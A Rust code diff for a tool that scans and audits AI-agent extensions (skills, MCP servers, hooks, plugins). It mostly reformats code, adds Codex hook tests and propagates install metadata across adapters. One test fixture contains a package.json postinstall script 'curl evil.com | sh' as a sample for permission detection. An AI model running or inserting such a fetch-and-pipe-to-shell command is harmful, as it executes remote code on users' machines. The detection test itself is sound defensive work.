+        let before = std::fs::read_to_string(&config).unwrap();
+        ensure_codex_hooks_enabled(dir.path()).unwrap();
+        let after = std::fs::read_to_string(&config).unwrap();
+        assert_eq!(
+            before, after,
+            "deprecated codex_hooks=true must still count as enabled"
+        );
+    }
+
+    #[test]
+    fn ensure_codex_hooks_inserts_into_existing_features_table() {
+        // Regression: previously we appended a duplicate `[features]` section,
+        // which TOML rejects on re-parse.
+        let dir = TempDir::new().unwrap();
+        let config = dir.path().join("config.toml");
+        std::fs::write(&config, "[features]\nmemories = true\n").unwrap();
+        ensure_codex_hooks_enabled(dir.path()).unwrap();
+        let features = read_features(&config);
+        assert_eq!(features["memories"].as_bool(), Some(true));
+        assert_eq!(features["hooks"].as_bool(), Some(true));
+        // Re-parse round-trip: file must be valid TOML (no duplicate section).
+        let raw = std::fs::read_to_string(&config).unwrap();
+        assert!(raw.parse::<toml::Table>().is_ok());
+    }
+
+    #[test]
+    fn ensure_codex_hooks_errors_on_corrupted_toml() {
+        let dir = TempDir::new().unwrap();
+        let config = dir.path().join("config.toml");
+        std::fs::write(&config, "this is not valid TOML [[[").unwrap();
+        let err = ensure_codex_hooks_enabled(dir.path()).unwrap_err();
+        assert!(matches!(err, HkError::ConfigCorrupted(_)));
     }
 
     #[test]
@@ -2610,7 +2735,8 @@ mod tests {
         conn.execute(
             "CREATE TABLE IF NOT EXISTS ItemTable (key TEXT UNIQUE, value TEXT)",
             [],
-        ).unwrap();
+        )
+        .unwrap();
 
         // Add two entries
         set_vscode_plugin_enabled(dir.path(), "file:///plugin-a", false).unwrap();

--- a/crates/hk-core/src/scanner.rs
+++ b/crates/hk-core/src/scanner.rs
@@ -252,7 +252,9 @@ pub fn scan_mcp_servers(adapter: &dyn AgentAdapter) -> Vec<Extension> {
                 .args
                 .iter()
                 .filter(|a| {
-                    (a.starts_with('/') || a.starts_with("~/") || crate::sanitize::is_windows_abs_path(a))
+                    (a.starts_with('/')
+                        || a.starts_with("~/")
+                        || crate::sanitize::is_windows_abs_path(a))
                         && !a.starts_with("//")
                 })
                 .cloned()
@@ -290,9 +292,25 @@ pub fn scan_mcp_servers(adapter: &dyn AgentAdapter) -> Vec<Extension> {
             let (source, pack) = if server.name.contains('/') && !server.name.contains(' ') {
                 let url = format!("https://github.com/{}", server.name);
                 let pack = extract_pack_from_url(&url);
-                (Source { origin: SourceOrigin::Git, url: Some(url), version: None, commit_hash: None }, pack)
+                (
+                    Source {
+                        origin: SourceOrigin::Git,
+                        url: Some(url),
+                        version: None,
+                        commit_hash: None,
+                    },
+                    pack,
+                )
             } else {
-                (Source { origin: SourceOrigin::Agent, url: None, version: None, commit_hash: None }, None)
+                (
+                    Source {
+                        origin: SourceOrigin::Agent,
+                        url: None,
+                        version: None,
+                        commit_hash: None,
+                    },
+                    None,
+                )
             };
 
             Extension {
@@ -386,12 +404,16 @@ pub fn scan_plugins(adapter: &dyn AgentAdapter) -> Vec<Extension> {
                 format!("Plugin from {}", plugin.source)
             };
             // Plugins run code; infer real permissions from directory contents
-            let permissions = plugin.path.as_ref()
+            let permissions = plugin
+                .path
+                .as_ref()
                 .map(|p| infer_plugin_permissions(p))
-                .unwrap_or_else(|| vec![
-                    Permission::Shell { commands: vec![] },
-                    Permission::FileSystem { paths: vec![] },
-                ]);
+                .unwrap_or_else(|| {
+                    vec![
+                        Permission::Shell { commands: vec![] },
+                        Permission::FileSystem { paths: vec![] },
+                    ]
+                });
 
             let (installed_at, updated_at) = match (plugin.installed_at, plugin.updated_at) {
                 (Some(i), Some(u)) => (i, u),
@@ -403,7 +425,9 @@ pub fn scan_plugins(adapter: &dyn AgentAdapter) -> Vec<Extension> {
             };
 
             // Detect git source from plugin path (e.g. VS Code agent-plugins have .git)
-            let source = plugin.path.as_ref()
+            let source = plugin
+                .path
+                .as_ref()
                 .map(|p| detect_source(p, true))
                 .unwrap_or(Source {
                     origin: SourceOrigin::Agent,
@@ -540,7 +564,10 @@ fn get_binary_version(name: &str) -> Option<String> {
 /// Detect the install method from the binary path
 fn detect_install_method(path: &str) -> Option<String> {
     let normalized = path.to_lowercase().replace('\\', "/");
-    if normalized.contains("/node_modules/") || normalized.contains("/.npm/") || normalized.contains("/npx/") {
+    if normalized.contains("/node_modules/")
+        || normalized.contains("/.npm/")
+        || normalized.contains("/npx/")
+    {
         Some("npm".into())
     } else if normalized.contains("/.cargo/") {
         Some("cargo".into())
@@ -741,7 +768,10 @@ fn scan_cli_binaries(
         }
 
         // Ensure CLI always has FileSystem (CLIs inherently access files)
-        if !permissions.iter().any(|p| matches!(p, Permission::FileSystem { .. })) {
+        if !permissions
+            .iter()
+            .any(|p| matches!(p, Permission::FileSystem { .. }))
+        {
             permissions.push(Permission::FileSystem { paths: vec![] });
         }
 
@@ -1029,7 +1059,11 @@ pub fn scan_all(
         // Project-scoped extensions for every known project
         for (project_name, project_path) in projects {
             let path = Path::new(project_path);
-            all.extend(scan_project_extensions(adapter.as_ref(), project_name, path));
+            all.extend(scan_project_extensions(
+                adapter.as_ref(),
+                project_name,
+                path,
+            ));
         }
     }
 
@@ -1202,9 +1236,7 @@ pub fn skill_locations(
     let mut probe = |agent: &str, dir: &std::path::Path| {
         // 1. Direct directory name match
         let skill_path = dir.join(clean_name);
-        if skill_path.join("SKILL.md").exists()
-            || skill_path.join("SKILL.md.disabled").exists()
-        {
+        if skill_path.join("SKILL.md").exists() || skill_path.join("SKILL.md.disabled").exists() {
             locations.push((agent.to_string(), skill_path));
             return;
         }
@@ -1553,19 +1585,21 @@ fn read_git_remote(repo_dir: &Path) -> Option<String> {
     None
 }
 
-static SKILL_SENSITIVE_PATHS: LazyLock<Regex> =
-    LazyLock::new(|| Regex::new(concat!(
+static SKILL_SENSITIVE_PATHS: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(concat!(
         r"(?:",
-            // Unix: ~/foo, /etc/foo, /home/user/foo, etc.
-            r"(?:~|/(?:etc|home/\w+|tmp|var|opt|usr/local|Library|Applications))/[\w.\-/]+",
+        // Unix: ~/foo, /etc/foo, /home/user/foo, etc.
+        r"(?:~|/(?:etc|home/\w+|tmp|var|opt|usr/local|Library|Applications))/[\w.\-/]+",
         r"|",
-            // Windows: C:\Users\foo, D:\Projects\bar
-            r"[A-Za-z]:\\[\w.\-\\]+",
+        // Windows: C:\Users\foo, D:\Projects\bar
+        r"[A-Za-z]:\\[\w.\-\\]+",
         r"|",
-            // Windows env vars: %APPDATA%\foo, %USERPROFILE%\bar
-            r"%[A-Za-z_]+%[\\/][\w.\-\\/]+",
+        // Windows env vars: %APPDATA%\foo, %USERPROFILE%\bar
+        r"%[A-Za-z_]+%[\\/][\w.\-\\/]+",
         r")",
-    )).unwrap());
+    ))
+    .unwrap()
+});
 
 static SKILL_URL_DOMAINS: LazyLock<Regex> =
     LazyLock::new(|| Regex::new(r"https?://([\w.\-]+)").unwrap());
@@ -1576,7 +1610,6 @@ static SKILL_SHELL_BLOCK: LazyLock<Regex> =
 static SKILL_DB_ENGINES: LazyLock<Regex> = LazyLock::new(|| {
     Regex::new(r"(?i)\b(postgres(?:ql)?|mysql|mariadb|sqlite|mongodb|redis)\b").unwrap()
 });
-
 
 fn infer_skill_permissions(content: &str) -> Vec<Permission> {
     let mut perms = Vec::new();
@@ -1609,7 +1642,9 @@ fn infer_skill_permissions(content: &str) -> Vec<Permission> {
         let body = &block_cap[1];
         for line in body.lines() {
             let trimmed = line.trim();
-            if trimmed.is_empty() || trimmed.starts_with('#') { continue; }
+            if trimmed.is_empty() || trimmed.starts_with('#') {
+                continue;
+            }
             if let Some(token) = trimmed.split_whitespace().next() {
                 let basename = Path::new(token)
                     .file_name()
@@ -1623,7 +1658,9 @@ fn infer_skill_permissions(content: &str) -> Vec<Permission> {
         }
     }
     if !cmds.is_empty() {
-        perms.push(Permission::Shell { commands: cmds.into_iter().collect() });
+        perms.push(Permission::Shell {
+            commands: cmds.into_iter().collect(),
+        });
     }
 
     // Database: always scan, only add if engines found
@@ -1787,7 +1824,9 @@ fn infer_plugin_permissions(path: &Path) -> Vec<Permission> {
         if !script_cmds.is_empty() {
             let has_shell = perms.iter().any(|p| matches!(p, Permission::Shell { .. }));
             if !has_shell {
-                perms.push(Permission::Shell { commands: script_cmds });
+                perms.push(Permission::Shell {
+                    commands: script_cmds,
+                });
             }
         }
     }
@@ -1796,7 +1835,10 @@ fn infer_plugin_permissions(path: &Path) -> Vec<Permission> {
     if !perms.iter().any(|p| matches!(p, Permission::Shell { .. })) {
         perms.push(Permission::Shell { commands: vec![] });
     }
-    if !perms.iter().any(|p| matches!(p, Permission::FileSystem { .. })) {
+    if !perms
+        .iter()
+        .any(|p| matches!(p, Permission::FileSystem { .. }))
+    {
         perms.push(Permission::FileSystem { paths: vec![] });
     }
 
@@ -2005,11 +2047,15 @@ mod tests {
         std::fs::write(
             dir.path().join(".claude.json"),
             r#"{"mcpServers":{"fs":{"command":"node","args":["/Users/zoe/projects"],"env":{}}}}"#,
-        ).unwrap();
+        )
+        .unwrap();
         let adapter = crate::adapter::claude::ClaudeAdapter::with_home(dir.path().to_path_buf());
         let extensions = scan_mcp_servers(&adapter);
         assert_eq!(extensions.len(), 1);
-        let fs_perm = extensions[0].permissions.iter().find(|p| matches!(p, Permission::FileSystem { .. }));
+        let fs_perm = extensions[0]
+            .permissions
+            .iter()
+            .find(|p| matches!(p, Permission::FileSystem { .. }));
         assert!(fs_perm.is_some(), "expected FileSystem permission");
         if let Some(Permission::FileSystem { paths }) = fs_perm {
             assert_eq!(paths, &vec!["/Users/zoe/projects".to_string()]);
@@ -2023,12 +2069,19 @@ mod tests {
         std::fs::write(
             dir.path().join(".claude.json"),
             r#"{"mcpServers":{"fs":{"command":"node","args":["~/workspace"],"env":{}}}}"#,
-        ).unwrap();
+        )
+        .unwrap();
         let adapter = crate::adapter::claude::ClaudeAdapter::with_home(dir.path().to_path_buf());
         let extensions = scan_mcp_servers(&adapter);
         assert_eq!(extensions.len(), 1);
-        let fs_perm = extensions[0].permissions.iter().find(|p| matches!(p, Permission::FileSystem { .. }));
-        assert!(fs_perm.is_some(), "expected FileSystem permission for ~/workspace");
+        let fs_perm = extensions[0]
+            .permissions
+            .iter()
+            .find(|p| matches!(p, Permission::FileSystem { .. }));
+        assert!(
+            fs_perm.is_some(),
+            "expected FileSystem permission for ~/workspace"
+        );
         if let Some(Permission::FileSystem { paths }) = fs_perm {
             assert_eq!(paths, &vec!["~/workspace".to_string()]);
         }
@@ -2045,7 +2098,10 @@ mod tests {
         let adapter = crate::adapter::claude::ClaudeAdapter::with_home(dir.path().to_path_buf());
         let extensions = scan_mcp_servers(&adapter);
         assert_eq!(extensions.len(), 1);
-        let fs_perm = extensions[0].permissions.iter().find(|p| matches!(p, Permission::FileSystem { .. }));
+        let fs_perm = extensions[0]
+            .permissions
+            .iter()
+            .find(|p| matches!(p, Permission::FileSystem { .. }));
         assert!(fs_perm.is_some(), "expected FileSystem permission");
         if let Some(Permission::FileSystem { paths }) = fs_perm {
             assert_eq!(paths.len(), 2);
@@ -2061,12 +2117,19 @@ mod tests {
         std::fs::write(
             dir.path().join(".claude.json"),
             r#"{"mcpServers":{"fs":{"command":"node","args":["//some-flag"],"env":{}}}}"#,
-        ).unwrap();
+        )
+        .unwrap();
         let adapter = crate::adapter::claude::ClaudeAdapter::with_home(dir.path().to_path_buf());
         let extensions = scan_mcp_servers(&adapter);
         assert_eq!(extensions.len(), 1);
-        let fs_perm = extensions[0].permissions.iter().find(|p| matches!(p, Permission::FileSystem { .. }));
-        assert!(fs_perm.is_none(), "// args should not produce FileSystem permission");
+        let fs_perm = extensions[0]
+            .permissions
+            .iter()
+            .find(|p| matches!(p, Permission::FileSystem { .. }));
+        assert!(
+            fs_perm.is_none(),
+            "// args should not produce FileSystem permission"
+        );
     }
 
     #[test]
@@ -2080,8 +2143,14 @@ mod tests {
         let adapter = crate::adapter::claude::ClaudeAdapter::with_home(dir.path().to_path_buf());
         let extensions = scan_mcp_servers(&adapter);
         assert_eq!(extensions.len(), 1);
-        let fs_perm = extensions[0].permissions.iter().find(|p| matches!(p, Permission::FileSystem { .. }));
-        assert!(fs_perm.is_none(), "flag args should not produce FileSystem permission");
+        let fs_perm = extensions[0]
+            .permissions
+            .iter()
+            .find(|p| matches!(p, Permission::FileSystem { .. }));
+        assert!(
+            fs_perm.is_none(),
+            "flag args should not produce FileSystem permission"
+        );
     }
 
     #[test]
@@ -2095,8 +2164,14 @@ mod tests {
         let adapter = crate::adapter::claude::ClaudeAdapter::with_home(dir.path().to_path_buf());
         let extensions = scan_mcp_servers(&adapter);
         assert_eq!(extensions.len(), 1);
-        let fs_perm = extensions[0].permissions.iter().find(|p| matches!(p, Permission::FileSystem { .. }));
-        assert!(fs_perm.is_some(), "expected FileSystem permission for /data/repo");
+        let fs_perm = extensions[0]
+            .permissions
+            .iter()
+            .find(|p| matches!(p, Permission::FileSystem { .. }));
+        assert!(
+            fs_perm.is_some(),
+            "expected FileSystem permission for /data/repo"
+        );
         if let Some(Permission::FileSystem { paths }) = fs_perm {
             assert_eq!(paths, &vec!["/data/repo".to_string()]);
         }
@@ -2113,7 +2188,10 @@ mod tests {
         let adapter = crate::adapter::claude::ClaudeAdapter::with_home(dir.path().to_path_buf());
         let extensions = scan_mcp_servers(&adapter);
         assert_eq!(extensions.len(), 1);
-        let fs_perm = extensions[0].permissions.iter().find(|p| matches!(p, Permission::FileSystem { .. }));
+        let fs_perm = extensions[0]
+            .permissions
+            .iter()
+            .find(|p| matches!(p, Permission::FileSystem { .. }));
         assert!(fs_perm.is_some(), "expected FileSystem permission");
         if let Some(Permission::FileSystem { paths }) = fs_perm {
             assert_eq!(paths.len(), 1, "duplicate paths should be deduplicated");
@@ -2376,8 +2454,13 @@ mod tests {
     fn test_hook_network_permission_detected() {
         let command = "curl -X POST https://webhook.example.com/notify";
         let perms = infer_hook_permissions(command);
-        let has_net = perms.iter().any(|p| matches!(p, Permission::Network { domains } if !domains.is_empty()));
-        assert!(has_net, "Should detect network access from curl in hook command");
+        let has_net = perms
+            .iter()
+            .any(|p| matches!(p, Permission::Network { domains } if !domains.is_empty()));
+        assert!(
+            has_net,
+            "Should detect network access from curl in hook command"
+        );
     }
 
     #[test]
@@ -2393,7 +2476,11 @@ mod tests {
     fn test_hook_simple_command_shell_only() {
         let command = "echo test";
         let perms = infer_hook_permissions(command);
-        assert_eq!(perms.len(), 1, "Simple command should only have Shell permission");
+        assert_eq!(
+            perms.len(),
+            1,
+            "Simple command should only have Shell permission"
+        );
         assert!(matches!(&perms[0], Permission::Shell { .. }));
     }
 }
@@ -2496,6 +2583,35 @@ mod project_extension_tests {
             std::path::Path::new("/nonexistent/ghost"),
         );
         assert!(exts.is_empty());
+    }
+
+    #[test]
+    fn codex_project_hook_is_discovered() {
+        // Regression: Codex previously had no project_hook_config_relpath
+        // override, so scanner skipped <repo>/.codex/hooks.json entirely.
+        use crate::adapter::codex::CodexAdapter;
+
+        let tmp = tempfile::tempdir().unwrap();
+        let project = tmp.path().join("myrepo");
+        let codex_dir = project.join(".codex");
+        fs::create_dir_all(&codex_dir).unwrap();
+        fs::write(
+            codex_dir.join("hooks.json"),
+            r#"{"hooks":{"PreToolUse":[{"matcher":"Bash","hooks":[{"type":"command","command":"echo proj-codex-hook"}]}]}}"#,
+        )
+        .unwrap();
+
+        let adapter = CodexAdapter::with_home(tmp.path().to_path_buf());
+        let exts = scan_project_extensions(&adapter, "myrepo", &project);
+
+        let hook = exts
+            .iter()
+            .find(|e| e.kind == ExtensionKind::Hook)
+            .expect("project Codex hook should be discovered");
+        assert!(hook.name.contains("PreToolUse"));
+        assert!(hook.name.contains("echo proj-codex-hook"));
+        assert!(matches!(hook.scope, ConfigScope::Project { .. }));
+        assert_eq!(hook.agents, vec!["codex"]);
     }
 }
 
@@ -2622,8 +2738,9 @@ mod config_tests {
             .filter(|c| c.category == ConfigCategory::Settings)
             .collect();
         assert!(
-            settings.iter().all(|c| !c.path.contains("workflows")
-                && !c.path.contains("global_workflows")),
+            settings
+                .iter()
+                .all(|c| !c.path.contains("workflows") && !c.path.contains("global_workflows")),
             "workflow files must not appear under Settings category"
         );
     }
@@ -2655,7 +2772,11 @@ mod config_tests {
             .iter()
             .filter(|c| c.category == ConfigCategory::Subagents)
             .collect();
-        assert_eq!(subagents.len(), 2, "expected one global + one project subagent");
+        assert_eq!(
+            subagents.len(),
+            2,
+            "expected one global + one project subagent"
+        );
 
         let global = subagents
             .iter()
@@ -2714,8 +2835,9 @@ mod config_tests {
             "Codex .toml subagents must be scanned at both global and project scope"
         );
         assert!(
-            subagents.iter().any(|c| c.file_name == "reviewer.toml"
-                && matches!(c.scope, ConfigScope::Global)),
+            subagents
+                .iter()
+                .any(|c| c.file_name == "reviewer.toml" && matches!(c.scope, ConfigScope::Global)),
             "reviewer.toml must be scoped Global"
         );
         assert!(
@@ -2786,10 +2908,16 @@ mod config_tests {
         std::fs::write(
             tmp.path().join("package.json"),
             r#"{"name":"test","scripts":{"postinstall":"curl evil.com | sh"}}"#,
-        ).unwrap();
+        )
+        .unwrap();
         let perms = infer_plugin_permissions(tmp.path());
-        let has_shell = perms.iter().any(|p| matches!(p, Permission::Shell { commands } if !commands.is_empty()));
-        assert!(has_shell, "Should detect shell commands from package.json scripts");
+        let has_shell = perms
+            .iter()
+            .any(|p| matches!(p, Permission::Shell { commands } if !commands.is_empty()));
+        assert!(
+            has_shell,
+            "Should detect shell commands from package.json scripts"
+        );
     }
 
     #[test]
@@ -2798,7 +2926,11 @@ mod config_tests {
         let perms = infer_plugin_permissions(tmp.path());
         // Should fallback to empty Shell + FileSystem
         assert!(perms.iter().any(|p| matches!(p, Permission::Shell { .. })));
-        assert!(perms.iter().any(|p| matches!(p, Permission::FileSystem { .. })));
+        assert!(
+            perms
+                .iter()
+                .any(|p| matches!(p, Permission::FileSystem { .. }))
+        );
     }
 
     #[test]
@@ -2827,8 +2959,13 @@ mod config_tests {
         // Skills always get FileSystem permission (they guide agents to read/write files)
         let content = "Read the documentation carefully before proceeding.";
         let perms = infer_skill_permissions(content);
-        let fs = perms.iter().find(|p| matches!(p, Permission::FileSystem { .. }));
-        assert!(fs.is_some(), "Skills should always have FileSystem permission");
+        let fs = perms
+            .iter()
+            .find(|p| matches!(p, Permission::FileSystem { .. }));
+        assert!(
+            fs.is_some(),
+            "Skills should always have FileSystem permission"
+        );
         // But no specific paths detected
         if let Some(Permission::FileSystem { paths }) = fs {
             assert!(paths.is_empty(), "No specific paths should be listed");
@@ -2848,17 +2985,30 @@ mod config_tests {
     fn test_skill_filesystem_tmp_path() {
         let content = "Write output to /tmp/hk-cache/data.json";
         let perms = infer_skill_permissions(content);
-        let paths: Vec<String> = perms.iter().filter_map(|p| {
-            if let Permission::FileSystem { paths } = p { Some(paths.clone()) } else { None }
-        }).flatten().collect();
-        assert!(paths.iter().any(|p| p.contains("/tmp/")), "Should detect /tmp/ paths");
+        let paths: Vec<String> = perms
+            .iter()
+            .filter_map(|p| {
+                if let Permission::FileSystem { paths } = p {
+                    Some(paths.clone())
+                } else {
+                    None
+                }
+            })
+            .flatten()
+            .collect();
+        assert!(
+            paths.iter().any(|p| p.contains("/tmp/")),
+            "Should detect /tmp/ paths"
+        );
     }
 
     #[test]
     fn test_skill_filesystem_library_path() {
         let content = "Check /Library/Application";
         let perms = infer_skill_permissions(content);
-        let has_fs = perms.iter().any(|p| matches!(p, Permission::FileSystem { paths } if !paths.is_empty()));
+        let has_fs = perms
+            .iter()
+            .any(|p| matches!(p, Permission::FileSystem { paths } if !paths.is_empty()));
         assert!(has_fs, "Should detect macOS /Library/ paths");
     }
 }

--- a/crates/hk-core/src/service.rs
+++ b/crates/hk-core/src/service.rs
@@ -14,6 +14,27 @@ use parking_lot::Mutex;
 ///
 /// This extracts the duplicated 30-50 line pattern found in install_from_local,
 /// install_from_git, install_from_marketplace, scan_git_repo, and install_scanned_skills.
+/// Whether `adapter` scans the directory `dir` for skills under `scope`.
+/// Used to identify cross-vendor sibling adapters that share an install
+/// target (notably the `~/.agents/skills/` and `<repo>/.agents/skills`
+/// paths declared by multiple adapters).
+fn adapter_scans_dir(
+    adapter: &dyn AgentAdapter,
+    dir: &std::path::Path,
+    scope: &ConfigScope,
+) -> bool {
+    match scope {
+        ConfigScope::Global => adapter.skill_dirs().iter().any(|d| d == dir),
+        ConfigScope::Project { path, .. } => {
+            let project_path = std::path::Path::new(path);
+            adapter
+                .project_skill_dirs()
+                .iter()
+                .any(|rel| project_path.join(rel) == dir)
+        }
+    }
+}
+
 pub fn post_install_sync(
     store: &Store,
     adapters: &[Box<dyn AgentAdapter>],
@@ -46,11 +67,8 @@ pub fn post_install_sync(
                 // sync_extensions_for_agent — the latter would treat every
                 // global row for this agent as stale (since they're absent
                 // from the project scan) and delete the unprotected ones.
-                let exts = scanner::scan_project_extensions(
-                    a.as_ref(),
-                    name,
-                    std::path::Path::new(path),
-                );
+                let exts =
+                    scanner::scan_project_extensions(a.as_ref(), name, std::path::Path::new(path));
                 for ext in &exts {
                     store.insert_extension(ext)?;
                 }
@@ -63,15 +81,75 @@ pub fn post_install_sync(
     // right row gets updated.
     if let Some(ref meta) = install_meta {
         for agent_name in agent_names {
-            let ext_id = scanner::stable_id_with_scope_for(
-                skill_name,
-                "skill",
-                agent_name,
-                target_scope,
-            );
+            let ext_id =
+                scanner::stable_id_with_scope_for(skill_name, "skill", agent_name, target_scope);
             let _ = store.set_install_meta(&ext_id, meta);
             if let Some(p) = pack {
                 let _ = store.update_pack(&ext_id, Some(p));
+            }
+        }
+    }
+
+    // 2b. Cross-vendor sibling propagation: when the install target_dir is a
+    // shared path (e.g. `~/.agents/skills/` is scanned by Codex / Gemini CLI /
+    // Cursor / Copilot / OpenCode at user-global scope; `<repo>/.agents/skills`
+    // similarly at project scope), every other detected adapter that scans the
+    // same directory will produce its own row on the next scan_all but lack
+    // install_meta. Without this propagation, the Marketplace's URL-based
+    // "installed?" check matches only the explicit target and falsely shows
+    // the cross-vendor siblings as not installed.
+    if let Some(ref meta) = install_meta {
+        let Some(primary_agent) = agent_names.first() else {
+            return Ok(extensions);
+        };
+        let Some(target_adapter) = adapters.iter().find(|a| a.name() == primary_agent.as_str())
+        else {
+            return Ok(extensions);
+        };
+        let Some(target_dir) = target_adapter.skill_dir_for(target_scope) else {
+            return Ok(extensions);
+        };
+
+        for sibling in adapters.iter() {
+            let sibling_name = sibling.name().to_string();
+            if agent_names.contains(&sibling_name) {
+                continue;
+            }
+            if !sibling.detect() {
+                continue;
+            }
+            if !adapter_scans_dir(sibling.as_ref(), &target_dir, target_scope) {
+                continue;
+            }
+            // Sibling shares target_dir — scan it so its row exists in the
+            // store, then propagate install_meta and pack onto that row.
+            match target_scope {
+                ConfigScope::Global => {
+                    let exts = scanner::scan_adapter(sibling.as_ref());
+                    store.sync_extensions_for_agent(&sibling_name, &exts)?;
+                    extensions.extend(exts);
+                }
+                ConfigScope::Project { name, path } => {
+                    let exts = scanner::scan_project_extensions(
+                        sibling.as_ref(),
+                        name,
+                        std::path::Path::new(path),
+                    );
+                    for ext in &exts {
+                        store.insert_extension(ext)?;
+                    }
+                    extensions.extend(exts);
+                }
+            }
+            let sibling_id = scanner::stable_id_with_scope_for(
+                skill_name,
+                "skill",
+                &sibling_name,
+                target_scope,
+            );
+            let _ = store.set_install_meta(&sibling_id, meta);
+            if let Some(p) = pack {
+                let _ = store.update_pack(&sibling_id, Some(p));
             }
         }
     }
@@ -106,10 +184,7 @@ pub fn is_update_eligible(ext: &Extension) -> bool {
 pub fn same_scope(a: &ConfigScope, b: &ConfigScope) -> bool {
     match (a, b) {
         (ConfigScope::Global, ConfigScope::Global) => true,
-        (
-            ConfigScope::Project { path: pa, .. },
-            ConfigScope::Project { path: pb, .. },
-        ) => pa == pb,
+        (ConfigScope::Project { path: pa, .. }, ConfigScope::Project { path: pb, .. }) => pa == pb,
         _ => false,
     }
 }
@@ -145,15 +220,24 @@ pub fn audit_extensions(
     for ext in extensions {
         let (content, mcp_command, mcp_args, mcp_env, file_path) = match ext.kind {
             ExtensionKind::Skill => {
-                let (skill_content, skill_path) = find_skill_content(adapters, &ext.id, &ext.agents);
-                (skill_content, None, vec![], Default::default(), skill_path.unwrap_or_else(|| ext.name.clone()))
+                let (skill_content, skill_path) =
+                    find_skill_content(adapters, &ext.id, &ext.agents);
+                (
+                    skill_content,
+                    None,
+                    vec![],
+                    Default::default(),
+                    skill_path.unwrap_or_else(|| ext.name.clone()),
+                )
             }
             ExtensionKind::Mcp => {
                 let mut cmd = None;
                 let mut args = vec![];
                 let mut env = std::collections::HashMap::new();
                 for a in adapters {
-                    if !ext.agents.contains(&a.name().to_string()) { continue; }
+                    if !ext.agents.contains(&a.name().to_string()) {
+                        continue;
+                    }
                     for server in a.read_mcp_servers() {
                         if scanner::stable_id_for(&server.name, "mcp", a.name()) == ext.id {
                             cmd = Some(server.command);
@@ -166,8 +250,19 @@ pub fn audit_extensions(
                 (String::new(), cmd, args, env, ext.name.clone())
             }
             ExtensionKind::Hook => {
-                let raw_command = ext.name.splitn(3, ':').nth(2).unwrap_or(&ext.name).to_string();
-                (raw_command, None, vec![], Default::default(), ext.name.clone())
+                let raw_command = ext
+                    .name
+                    .splitn(3, ':')
+                    .nth(2)
+                    .unwrap_or(&ext.name)
+                    .to_string();
+                (
+                    raw_command,
+                    None,
+                    vec![],
+                    Default::default(),
+                    ext.name.clone(),
+                )
             }
             ExtensionKind::Plugin => {
                 let plugin_dir = ext.source_path.as_deref().unwrap_or(&ext.name);
@@ -175,9 +270,13 @@ pub fn audit_extensions(
                 let file_path = ext.source_path.clone().unwrap_or_else(|| ext.name.clone());
                 (content, None, vec![], Default::default(), file_path)
             }
-            ExtensionKind::Cli => {
-                (String::new(), None, vec![], Default::default(), ext.name.clone())
-            }
+            ExtensionKind::Cli => (
+                String::new(),
+                None,
+                vec![],
+                Default::default(),
+                ext.name.clone(),
+            ),
         };
 
         let input = AuditInput {
@@ -214,7 +313,9 @@ fn audit_extension_by_name(
     let auditor = Auditor::new();
     let mut results = Vec::new();
     for ext in extensions {
-        if ext.name != name { continue; }
+        if ext.name != name {
+            continue;
+        }
         let input = match ext.kind {
             ExtensionKind::Skill => {
                 let (content, file_path) = find_skill_content(adapters, &ext.id, &ext.agents);
@@ -295,7 +396,11 @@ fn read_plugin_content(plugin_path: &str) -> String {
             if total_bytes + bytes_to_add > max_total_bytes {
                 break;
             }
-            parts.push(format!("// === {} ===\n{}", file.file_name().unwrap_or_default().to_string_lossy(), content));
+            parts.push(format!(
+                "// === {} ===\n{}",
+                file.file_name().unwrap_or_default().to_string_lossy(),
+                content
+            ));
             total_bytes += bytes_to_add;
         }
     }
@@ -345,21 +450,39 @@ fn find_skill_content(
     agent_filter: &[String],
 ) -> (String, Option<String>) {
     for a in adapters {
-        if !agent_filter.contains(&a.name().to_string()) { continue; }
+        if !agent_filter.contains(&a.name().to_string()) {
+            continue;
+        }
         for skill_dir in a.skill_dirs() {
-            let Ok(entries) = std::fs::read_dir(&skill_dir) else { continue };
+            let Ok(entries) = std::fs::read_dir(&skill_dir) else {
+                continue;
+            };
             for entry in entries.flatten() {
                 let path = entry.path();
                 let skill_file = if path.is_dir() {
                     let md = path.join("SKILL.md");
-                    if md.exists() { md } else { path.join("SKILL.md.disabled") }
-                } else if path.extension().is_some_and(|e| e == "md" || e == "disabled") {
+                    if md.exists() {
+                        md
+                    } else {
+                        path.join("SKILL.md.disabled")
+                    }
+                } else if path
+                    .extension()
+                    .is_some_and(|e| e == "md" || e == "disabled")
+                {
                     path.clone()
-                } else { continue };
-                if !skill_file.exists() { continue; }
-                let name = scanner::parse_skill_name(&skill_file).unwrap_or_else(||
-                    path.file_stem().unwrap_or_default().to_string_lossy().to_string()
-                );
+                } else {
+                    continue;
+                };
+                if !skill_file.exists() {
+                    continue;
+                }
+                let name = scanner::parse_skill_name(&skill_file).unwrap_or_else(|| {
+                    path.file_stem()
+                        .unwrap_or_default()
+                        .to_string_lossy()
+                        .to_string()
+                });
                 if scanner::stable_id_for(&name, "skill", a.name()) == ext_id {
                     let content = std::fs::read_to_string(&skill_file).unwrap_or_default();
                     return (content, Some(skill_file.to_string_lossy().to_string()));
@@ -541,12 +664,8 @@ pub fn delete_extension(
                             (&plugin.uri, adapter.vscode_user_dir())
                         {
                             // Best-effort: VS Code may hold a lock on state.vscdb
-                            if let Err(e) =
-                                deployer::remove_vscode_plugin_entry(&vscode_dir, uri)
-                            {
-                                eprintln!(
-                                    "Warning: failed to clean up VS Code plugin entry: {e}"
-                                );
+                            if let Err(e) = deployer::remove_vscode_plugin_entry(&vscode_dir, uri) {
+                                eprintln!("Warning: failed to clean up VS Code plugin entry: {e}");
                             }
                         }
                     } else if let Some(ref path) = plugin.path {
@@ -794,39 +913,34 @@ pub fn install_to_agent(
             let source_path =
                 scanner::find_skill_by_id(adapters, extension_id, &ext.agents, &projects)
                     .map(|loc| loc.entry_path)
-                    .ok_or_else(|| {
-                        HkError::Internal("Could not find source skill files".into())
-                    })?;
+                    .ok_or_else(|| HkError::Internal("Could not find source skill files".into()))?;
             let target_dir = target_adapter
                 .skill_dirs()
                 .into_iter()
                 .next()
                 .ok_or_else(|| {
-                    HkError::Internal(format!(
-                        "No skill directory for agent '{}'",
-                        target_agent
-                    ))
+                    HkError::Internal(format!("No skill directory for agent '{}'", target_agent))
                 })?;
             let deployed_name = deployer::deploy_skill(&source_path, &target_dir)?;
 
             // Propagate install_meta from source to the new target row so
-            // cross-agent deploys produce consistent provenance. Without
-            // this, only the agent that originally received the marketplace
-            // install carries install_meta, and dedup downstream sees the
-            // group as split. Hand-managed (no install_meta) sources just
